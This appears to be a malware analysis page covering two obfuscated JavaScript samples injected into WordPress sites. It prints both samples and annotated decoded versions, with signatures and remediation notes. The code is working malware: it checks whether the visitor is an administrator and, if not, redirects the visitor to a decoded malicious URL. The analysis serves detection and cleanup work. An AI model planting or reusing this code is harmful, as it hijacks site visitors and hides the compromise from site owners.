wp-admin/user-new.php malware
Malicious JS (obfuscated, as found)
// Sample 1, obfuscated form as found. Layout: string table `_0x23e9`, an index accessor
// (`_0x12b5`, offset 0x75), a self-invoking rotation loop keyed on the constant 0x94cf0, then
// checkme()/httpGet() and the redirect. The readable version follows further down this page.
// Literals that survive the obfuscation and are usable as signatures: '/wp-admin/user-new.php',
// '_wpnonce_create-user', 'wp-login', and the long String.fromCharCode(...) call carrying the
// redirect URL (decoded at the end of this page).
var _0x23e9=['fromCharCode','href','protocol','_wpnonce_create-user','hostname','2393Pryhqw','open','/wp-admin/user-new.php','responseText','409897xshIay','location','169513QzOUxL','50FowjZA','wp-login','9859XsvnsI','781107ACONqL','971499IySred','replace','137OAkHgN','19aiEBJJ','send','indexOf','stop','146NrndrR','8530CekIlp','match'];var _0x12b5=function(_0x4550ff,_0x13cb05){_0x4550ff=_0x4550ff-0x75;var _0x23e9f6=_0x23e9[_0x4550ff];return _0x23e9f6;};var _0x47a6be=_0x12b5;(function(_0x40233a,_0x370641){var _0x58b599=_0x12b5;while(!![]){try{var _0x59ca3d=-parseInt(_0x58b599(0x7e))*parseInt(_0x58b599(0x76))+-parseInt(_0x58b599(0x87))*parseInt(_0x58b599(0x85))+parseInt(_0x58b599(0x88))+-parseInt(_0x58b599(0x82))+-parseInt(_0x58b599(0x89))+parseInt(_0x58b599(0x77))*-parseInt(_0x58b599(0x8b))+-parseInt(_0x58b599(0x8c))*-parseInt(_0x58b599(0x84));if(_0x59ca3d===_0x370641)break;else _0x40233a['push'](_0x40233a['shift']());}catch(_0x2b4363){_0x40233a['push'](_0x40233a['shift']());}}}(_0x23e9,0x94cf0));function checkme(){var _0xf7249d=_0x12b5,_0xcdc926=window[_0xf7249d(0x83)][_0xf7249d(0x7b)]+'//'+window[_0xf7249d(0x83)][_0xf7249d(0x7d)],_0x4b9617=httpGet(_0xcdc926+_0xf7249d(0x80)),_0x1824e4=/name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;if(_0x4b9617[_0xf7249d(0x8e)](_0xf7249d(0x7c))!==-0x1){var _0x2bd2b5=_0x1824e4['exec'](_0x4b9617);if(_0x2bd2b5[0x2][_0xf7249d(0x78)](/([a-z0-9]{10})/))return 0x1;}return 0x0;}if(checkme()==0x0){if(window[_0x47a6be(0x83)]['href'][_0x47a6be(0x8e)](_0x47a6be(0x86))>-0x1){}else{window[_0x47a6be(0x75)]();var 
lp=String[_0x47a6be(0x79)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x47a6be(0x83)][_0x47a6be(0x8a)](lp),document['location'][_0x47a6be(0x7a)]=lp;}}else{}function httpGet(_0x45b588){var _0x14042e=_0x47a6be,_0x2d0603=new XMLHttpRequest();return _0x2d0603[_0x14042e(0x7f)]('GET',_0x45b588,![]),_0x2d0603[_0x14042e(0x8d)](null),_0x2d0603[_0x14042e(0x81)];} | |
// Sample 2, obfuscated form as found: same construction (table `_0x2825`, accessor `_0x56b8` with
// offset 0x86, rotation keyed on 0xdea87) and the same char-coded redirect URL. Visible
// differences from sample 1: checkme() returns 1 as soon as the current URL contains 'wp-login',
// and the nonce value is only searched for with indexOf (no regex on its format).
// The readable version is given further down this page.
var _0x2825=['3hDSBaH','877436TcDUUT','/wp-admin/user-new.php','1533496ZfMzaT','111413jVhcXt','1iyZpOm','href','850953KfrjDB','replace','1328659gEXdcO','location','send','open','hostname','1670551uThOzi','_wpnonce_create-user','responseText','GET','81125ZdnGmk','indexOf','stop','fromCharCode'];var _0x56b8=function(_0x5416f9,_0x15f35e){_0x5416f9=_0x5416f9-0x86;var _0x2825ba=_0x2825[_0x5416f9];return _0x2825ba;};var _0x3f0146=_0x56b8;(function(_0x38c1d2,_0x2490b8){var _0x269a76=_0x56b8;while(!![]){try{var _0x58eac5=parseInt(_0x269a76(0x8a))+-parseInt(_0x269a76(0x88))+parseInt(_0x269a76(0x99))+-parseInt(_0x269a76(0x8b))*parseInt(_0x269a76(0x87))+parseInt(_0x269a76(0x8e))+-parseInt(_0x269a76(0x95))*parseInt(_0x269a76(0x8c))+parseInt(_0x269a76(0x90));if(_0x58eac5===_0x2490b8)break;else _0x38c1d2['push'](_0x38c1d2['shift']());}catch(_0x5d00d9){_0x38c1d2['push'](_0x38c1d2['shift']());}}}(_0x2825,0xdea87));function checkme(){var _0xb9d504=_0x56b8;if(window[_0xb9d504(0x91)][_0xb9d504(0x8d)][_0xb9d504(0x9a)]('wp-login')!==-0x1)return 0x1;var _0x51714c=window[_0xb9d504(0x91)]['protocol']+'//'+window[_0xb9d504(0x91)][_0xb9d504(0x94)],_0x59b537=httpGet(_0x51714c+_0xb9d504(0x89));if(_0x59b537[_0xb9d504(0x9a)](_0xb9d504(0x96))!==-0x1)return 0x1;return 0x0;}if(checkme()==0x0){window[_0x3f0146(0x9b)]();var lp=String[_0x3f0146(0x86)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x3f0146(0x91)][_0x3f0146(0x8f)](lp),document[_0x3f0146(0x91)][_0x3f0146(0x8d)]=lp;}else{}function httpGet(_0x2a8611){var _0x3fcc12=_0x3f0146,_0x371e5f=new XMLHttpRequest();return 
_0x371e5f[_0x3fcc12(0x93)](_0x3fcc12(0x98),_0x2a8611,![]),_0x371e5f[_0x3fcc12(0x92)](null),_0x371e5f[_0x3fcc12(0x97)];} | |
1. Decoded form of the first sample (string table `_0x23e9`)
'use strict'; | |
// Sample 1 (deobfuscated). String table read by the index accessor `_0x12b5` defined below.
// The eleven entries that start with digits ("2393Pryhqw", "409897xshIay", ...) are consumed only
// by the parseInt() checksum of the rotation loop; every other entry is a property name
// (location, href, protocol, hostname, open, send, responseText, indexOf, match, replace, stop,
// fromCharCode), the marker "wp-login", the form field "_wpnonce_create-user" or the path
// "/wp-admin/user-new.php" that the payload later resolves by numeric index.
// Detection note: the path and the nonce field name are present in clear text in the obfuscated
// form as well, so they make stable signatures for this family.
/** @type {!Array} */ | |
var _0x23e9 = ["fromCharCode", "href", "protocol", "_wpnonce_create-user", "hostname", "2393Pryhqw", "open", "/wp-admin/user-new.php", "responseText", "409897xshIay", "location", "169513QzOUxL", "50FowjZA", "wp-login", "9859XsvnsI", "781107ACONqL", "971499IySred", "replace", "137OAkHgN", "19aiEBJJ", "send", "indexOf", "stop", "146NrndrR", "8530CekIlp", "match"]; | |
/**
 * String-table accessor: returns `_0x23e9[index - 117]` (0x75 in the obfuscated form).
 * The second parameter is never read; it is decoy noise from the obfuscator.
 * Because the table is rotated by the self-invoking loop below, an index only maps to a
 * meaningful string after that loop has run (e.g. 131 -> "location", 128 -> "/wp-admin/user-new.php").
 * @param {number} totalExpectedResults obfuscated index (117..142 for this table)
 * @param {?} entrySelector unused
 * @return {?} the table entry
 */
var _0x12b5 = function(totalExpectedResults, entrySelector) { | |
/** @type {number} */ | |
totalExpectedResults = totalExpectedResults - 117; | |
var _0x23e9f6 = _0x23e9[totalExpectedResults]; | |
return _0x23e9f6; | |
}; | |
/** @type {function(number, ?): ?} */
// Second alias for the accessor; used by the top-level redirect logic and by httpGet().
var _0x47a6be = _0x12b5; | |
// Self-invoking string-table rotation. Each pass moves the first table entry to the end
// (shift + push) until a checksum built from parseInt() of eleven numeric-prefixed entries equals
// 609520; a parse failure is caught and simply rotates once more. Working the checksum against the
// table above gives 22 rotations, after which 131 resolves to "location", 124 to
// "_wpnonce_create-user", 128 to "/wp-admin/user-new.php", 134 to "wp-login", and so on.
// This construction is consistent with javascript-obfuscator's string-array rotation; the
// numeric indexes used everywhere below are only meaningful post-rotation.
(function(PL$107, y) { | |
/** @type {function(number, ?): ?} */ | |
var toMonths = _0x12b5; | |
for (; !![];) { | |
try { | |
/** @type {number} */ | |
var swipingDirection = -parseInt(toMonths(126)) * parseInt(toMonths(118)) + -parseInt(toMonths(135)) * parseInt(toMonths(133)) + parseInt(toMonths(136)) + -parseInt(toMonths(130)) + -parseInt(toMonths(137)) + parseInt(toMonths(119)) * -parseInt(toMonths(139)) + -parseInt(toMonths(140)) * -parseInt(toMonths(132)); | |
if (swipingDirection === y) { | |
break; | |
} else { | |
PL$107["push"](PL$107["shift"]()); | |
} | |
} catch (_0x2b4363) { | |
PL$107["push"](PL$107["shift"]()); | |
} | |
} | |
})(_0x23e9, 609520); | |
/**
 * Privilege probe. Builds the page's own origin (131 = "location", 123 = "protocol",
 * 125 = "hostname"), issues a blocking same-origin GET for /wp-admin/user-new.php (128) — which
 * the browser sends with the visitor's own cookies — and returns 1 only if the response body
 * contains "_wpnonce_create-user" (124, via 142 = "indexOf") AND the regex below captures a value
 * that matches ten [a-z0-9] characters (120 = "match"); otherwise 0.
 * In WordPress the add-user form, and therefore that nonce field, is served only to a logged-in
 * user who is allowed to create users; other sessions are sent to the login page without it. So a
 * result of 1 appears to identify an administrator session and 0 an ordinary visitor — confirm
 * against the WordPress version in question.
 * Detection note: front-end visitors requesting /wp-admin/user-new.php is anomalous and shows up
 * in the web server access log and in browser network tooling.
 * @return {?} 1 when the create-user nonce is present, 0 otherwise
 */
function checkme() { | |
/** @type {function(number, ?): ?} */ | |
var d3_vendorSymbol = _0x12b5; | |
var _0xcdc926 = window[d3_vendorSymbol(131)][d3_vendorSymbol(123)] + "//" + window[d3_vendorSymbol(131)][d3_vendorSymbol(125)]; | |
var n = httpGet(_0xcdc926 + d3_vendorSymbol(128)); | |
/** @type {!RegExp} */ | |
var dojo = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g; | |
if (n[d3_vendorSymbol(142)](d3_vendorSymbol(124)) !== -1) { | |
var diffVector = dojo["exec"](n); | |
if (diffVector[2][d3_vendorSymbol(120)](/([a-z0-9]{10})/)) { | |
return 1; | |
} | |
} | |
return 0; | |
} | |
// Payload trigger. Only sessions that fail the privilege probe reach the redirect, and the inner
// guard additionally skips any page whose URL contains "wp-login" (134), so the login form keeps
// working. Net effect: administrators and people on the login page see nothing, which hampers
// discovery by the site owner; every other visitor is redirected.
// Redirect mechanics: window.stop() (117) aborts loading of the legitimate page, `lp` is rebuilt
// from char codes (121 = "fromCharCode") — it spells the blow.talkingaboutfirms.ga URL listed
// under the "Malicious URLs" heading at the end of this page — and the browser is sent there via
// location.replace (138) followed by a location.href assignment (122). The empty if/else
// branches are leftovers of the obfuscation and do nothing.
// Remediation: if this script was found inside wp-admin/user-new.php (as the page title suggests),
// restore that core file from a clean copy of the same WordPress release and then locate the
// injection path; the obfuscated and decoded forms on this page differ only in formatting.
if (checkme() == 0) { | |
if (window[_0x47a6be(131)]["href"][_0x47a6be(142)](_0x47a6be(134)) > -1) { | |
} else { | |
window[_0x47a6be(117)](); | |
var lp = String[_0x47a6be(121)](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 111, 119, 46, 116, 97, 108, 107, 105, 110, 103, 97, 98, 111, 117, 116, 102, 105, 114, 109, 115, 46, 103, 97, 47, 63, 115, 105, 100, 61, 53, 52, 55, 52, 53, 45, 51, 51, 45, 54, 55, 52, 51, 52, 55, 45, 50, 49, 38, 99, 105, 100, 61, 51, 55, 56, 51, 52, 53, 38, 112, 105, 100, 105, 61, 54, 53, 52, 51, 54, 56, 38, 97, 105, 100, 61, 50, 55, 56, 51, 51); | |
window[_0x47a6be(131)][_0x47a6be(138)](lp); | |
document["location"][_0x47a6be(122)] = lp; | |
} | |
} else { | |
} | |
/**
 * Blocking GET helper: opens an XMLHttpRequest with async = false (the `![]` argument), sends it
 * with no body (141 = "send") and returns responseText (129). Because the request is synchronous,
 * checkme() has its answer before the rest of the page continues, which lets the redirect fire
 * early. Indexes: 127 = "open".
 * @param {?} url absolute URL assembled by checkme() from the page's own protocol and hostname
 * @return {?} response body as text
 */
function httpGet(url) { | |
var convertObjectWithTemplates = _0x47a6be; | |
/** @type {!XMLHttpRequest} */ | |
var xhr = new XMLHttpRequest; | |
return xhr[convertObjectWithTemplates(127)]("GET", url, ![]), xhr[convertObjectWithTemplates(141)](null), xhr[convertObjectWithTemplates(129)]; | |
} | |
; | |
2. Decoded form of the second sample (string table `_0x2825`)
// Sample 2, obfuscated form (a repeat of the listing given earlier on this page, reproduced here
// so it sits next to its decoded form, which follows immediately). Same string-table/accessor/
// rotation construction as sample 1; the clear-text '/wp-admin/user-new.php', '_wpnonce_create-user'
// and 'wp-login' literals and the String.fromCharCode(...) redirect URL are the signature points.
var _0x2825=['3hDSBaH','877436TcDUUT','/wp-admin/user-new.php','1533496ZfMzaT','111413jVhcXt','1iyZpOm','href','850953KfrjDB','replace','1328659gEXdcO','location','send','open','hostname','1670551uThOzi','_wpnonce_create-user','responseText','GET','81125ZdnGmk','indexOf','stop','fromCharCode'];var _0x56b8=function(_0x5416f9,_0x15f35e){_0x5416f9=_0x5416f9-0x86;var _0x2825ba=_0x2825[_0x5416f9];return _0x2825ba;};var _0x3f0146=_0x56b8;(function(_0x38c1d2,_0x2490b8){var _0x269a76=_0x56b8;while(!![]){try{var _0x58eac5=parseInt(_0x269a76(0x8a))+-parseInt(_0x269a76(0x88))+parseInt(_0x269a76(0x99))+-parseInt(_0x269a76(0x8b))*parseInt(_0x269a76(0x87))+parseInt(_0x269a76(0x8e))+-parseInt(_0x269a76(0x95))*parseInt(_0x269a76(0x8c))+parseInt(_0x269a76(0x90));if(_0x58eac5===_0x2490b8)break;else _0x38c1d2['push'](_0x38c1d2['shift']());}catch(_0x5d00d9){_0x38c1d2['push'](_0x38c1d2['shift']());}}}(_0x2825,0xdea87));function checkme(){var _0xb9d504=_0x56b8;if(window[_0xb9d504(0x91)][_0xb9d504(0x8d)][_0xb9d504(0x9a)]('wp-login')!==-0x1)return 0x1;var _0x51714c=window[_0xb9d504(0x91)]['protocol']+'//'+window[_0xb9d504(0x91)][_0xb9d504(0x94)],_0x59b537=httpGet(_0x51714c+_0xb9d504(0x89));if(_0x59b537[_0xb9d504(0x9a)](_0xb9d504(0x96))!==-0x1)return 0x1;return 0x0;}if(checkme()==0x0){window[_0x3f0146(0x9b)]();var lp=String[_0x3f0146(0x86)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x6c,0x6f,0x77,0x2e,0x74,0x61,0x6c,0x6b,0x69,0x6e,0x67,0x61,0x62,0x6f,0x75,0x74,0x66,0x69,0x72,0x6d,0x73,0x2e,0x67,0x61,0x2f,0x3f,0x73,0x69,0x64,0x3d,0x35,0x34,0x37,0x34,0x35,0x2d,0x33,0x33,0x2d,0x36,0x37,0x34,0x33,0x34,0x37,0x2d,0x32,0x31,0x26,0x63,0x69,0x64,0x3d,0x33,0x37,0x38,0x33,0x34,0x35,0x26,0x70,0x69,0x64,0x69,0x3d,0x36,0x35,0x34,0x33,0x36,0x38,0x26,0x61,0x69,0x64,0x3d,0x32,0x37,0x38,0x33,0x33);window[_0x3f0146(0x91)][_0x3f0146(0x8f)](lp),document[_0x3f0146(0x91)][_0x3f0146(0x8d)]=lp;}else{}function httpGet(_0x2a8611){var _0x3fcc12=_0x3f0146,_0x371e5f=new XMLHttpRequest();return 
_0x371e5f[_0x3fcc12(0x93)](_0x3fcc12(0x98),_0x2a8611,![]),_0x371e5f[_0x3fcc12(0x92)](null),_0x371e5f[_0x3fcc12(0x97)];} | |
'use strict'; | |
// Sample 2 (deobfuscated). String table read by the accessor `_0x56b8` below. The nine entries
// with a numeric prefix ("3hDSBaH", "877436TcDUUT", ...) feed only the rotation checksum; the rest
// are property names (href, replace, location, send, open, hostname, responseText, indexOf, stop,
// fromCharCode), the verb "GET", the form field "_wpnonce_create-user" and the path
// "/wp-admin/user-new.php". Unlike sample 1 the "wp-login" marker is not in the table here — it
// is an inline literal inside checkme().
/** @type {!Array} */ | |
var _0x2825 = ["3hDSBaH", "877436TcDUUT", "/wp-admin/user-new.php", "1533496ZfMzaT", "111413jVhcXt", "1iyZpOm", "href", "850953KfrjDB", "replace", "1328659gEXdcO", "location", "send", "open", "hostname", "1670551uThOzi", "_wpnonce_create-user", "responseText", "GET", "81125ZdnGmk", "indexOf", "stop", "fromCharCode"]; | |
/**
 * String-table accessor: returns `_0x2825[index - 134]` (0x86 in the obfuscated form). The second
 * parameter is never read. Indexes are meaningful only after the rotation loop below has run
 * (e.g. 145 -> "location", 137 -> "/wp-admin/user-new.php", 150 -> "_wpnonce_create-user").
 * @param {number} totalExpectedResults obfuscated index (134..155 for this table)
 * @param {?} entrySelector unused
 * @return {?} the table entry
 */
var _0x56b8 = function(totalExpectedResults, entrySelector) { | |
/** @type {number} */ | |
totalExpectedResults = totalExpectedResults - 134; | |
var _0x2825ba = _0x2825[totalExpectedResults]; | |
return _0x2825ba; | |
}; | |
/** @type {function(number, ?): ?} */
// Second alias for the accessor; used by the redirect logic and httpGet() below.
var _0x3f0146 = _0x56b8; | |
// Self-invoking string-table rotation, same scheme as sample 1: shift the first entry to the end
// until the parseInt() checksum over nine numeric-prefixed entries equals 912007 (a parse failure is
// caught and rotates once more). Working it against the table above gives 21 rotations, which is
// the layout the numeric indexes in checkme()/httpGet() assume. Consistent with
// javascript-obfuscator's string-array rotation.
(function(PL$107, y) { | |
/** @type {function(number, ?): ?} */ | |
var toMonths = _0x56b8; | |
for (; !![];) { | |
try { | |
/** @type {number} */ | |
var swipingDirection = parseInt(toMonths(138)) + -parseInt(toMonths(136)) + parseInt(toMonths(153)) + -parseInt(toMonths(139)) * parseInt(toMonths(135)) + parseInt(toMonths(142)) + -parseInt(toMonths(149)) * parseInt(toMonths(140)) + parseInt(toMonths(144)); | |
if (swipingDirection === y) { | |
break; | |
} else { | |
PL$107["push"](PL$107["shift"]()); | |
} | |
} catch (_0x5d00d9) { | |
PL$107["push"](PL$107["shift"]()); | |
} | |
} | |
})(_0x2825, 912007); | |
/**
 * Privilege probe, sample-2 variant. Returns 1 immediately when the current URL (145 = "location",
 * 141 = "href", 154 = "indexOf") contains "wp-login" — the login-page exemption that sample 1 kept
 * at the top level. Otherwise it issues a blocking same-origin GET for /wp-admin/user-new.php
 * (137; origin built from "protocol" and 148 = "hostname"), sent with the visitor's own cookies,
 * and returns 1 if the body contains "_wpnonce_create-user" (150); the regex check on the nonce
 * value present in sample 1 is gone. Returns 0 otherwise.
 * In WordPress that nonce field is served only to a logged-in user allowed to create users, so 1
 * appears to mean "administrator (or login page)" and 0 "ordinary visitor" — confirm against the
 * WordPress version in question.
 * Detection note: front-end sessions fetching /wp-admin/user-new.php stand out in the web server
 * access log and in browser network tooling.
 * @return {?} 1 to suppress the payload, 0 to run it
 */
function checkme() { | |
/** @type {function(number, ?): ?} */ | |
var d3_vendorSymbol = _0x56b8; | |
if (window[d3_vendorSymbol(145)][d3_vendorSymbol(141)][d3_vendorSymbol(154)]("wp-login") !== -1) { | |
return 1; | |
} | |
var _0x51714c = window[d3_vendorSymbol(145)]["protocol"] + "//" + window[d3_vendorSymbol(145)][d3_vendorSymbol(148)]; | |
var n = httpGet(_0x51714c + d3_vendorSymbol(137)); | |
if (n[d3_vendorSymbol(154)](d3_vendorSymbol(150)) !== -1) { | |
return 1; | |
} | |
return 0; | |
} | |
// Payload trigger: runs only when checkme() returned 0, i.e. not on a wp-login URL and no
// create-user nonce visible to this session. window.stop() (155) aborts loading of the legitimate
// page, `lp` is rebuilt from char codes (134 = "fromCharCode") — the same blow.talkingaboutfirms.ga
// URL as in sample 1, listed under the "Malicious URLs" heading at the end of this page — and the
// browser is sent there via location.replace (143) followed by a location.href assignment (141).
// The empty else branch is an obfuscation leftover. Administrators never reach this branch, which
// is what keeps the compromise out of the site owner's view.
// Remediation as for sample 1: restore the affected core file from a clean copy of the same
// WordPress release and locate the injection path.
if (checkme() == 0) { | |
window[_0x3f0146(155)](); | |
var lp = String[_0x3f0146(134)](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 111, 119, 46, 116, 97, 108, 107, 105, 110, 103, 97, 98, 111, 117, 116, 102, 105, 114, 109, 115, 46, 103, 97, 47, 63, 115, 105, 100, 61, 53, 52, 55, 52, 53, 45, 51, 51, 45, 54, 55, 52, 51, 52, 55, 45, 50, 49, 38, 99, 105, 100, 61, 51, 55, 56, 51, 52, 53, 38, 112, 105, 100, 105, 61, 54, 53, 52, 51, 54, 56, 38, 97, 105, 100, 61, 50, 55, 56, 51, 51); | |
window[_0x3f0146(145)][_0x3f0146(143)](lp); | |
document[_0x3f0146(145)][_0x3f0146(141)] = lp; | |
} else { | |
} | |
/**
 * Blocking GET helper, sample-2 variant: the verb comes from the table (152 = "GET") instead of an
 * inline literal; otherwise identical to sample 1 — open (147) with async = false (`![]`), send
 * (146) with no body, return responseText (151). The synchronous mode means checkme() has its
 * answer before the rest of the page continues.
 * @param {?} url absolute URL assembled by checkme() from the page's own protocol and hostname
 * @return {?} response body as text
 */
function httpGet(url) { | |
var now = _0x3f0146; | |
/** @type {!XMLHttpRequest} */ | |
var rpm_traffic = new XMLHttpRequest; | |
return rpm_traffic[now(147)](now(152), url, ![]), rpm_traffic[now(146)](null), rpm_traffic[now(151)]; | |
} | |
; | |
Malicious URL encoded in the payload (the `String.fromCharCode` argument list assigned to `lp` in both samples):
https://blow.talkingaboutfirms.ga/?sid=54745-33-674347-21&cid=378345&pidi=654368&aid=27833 | |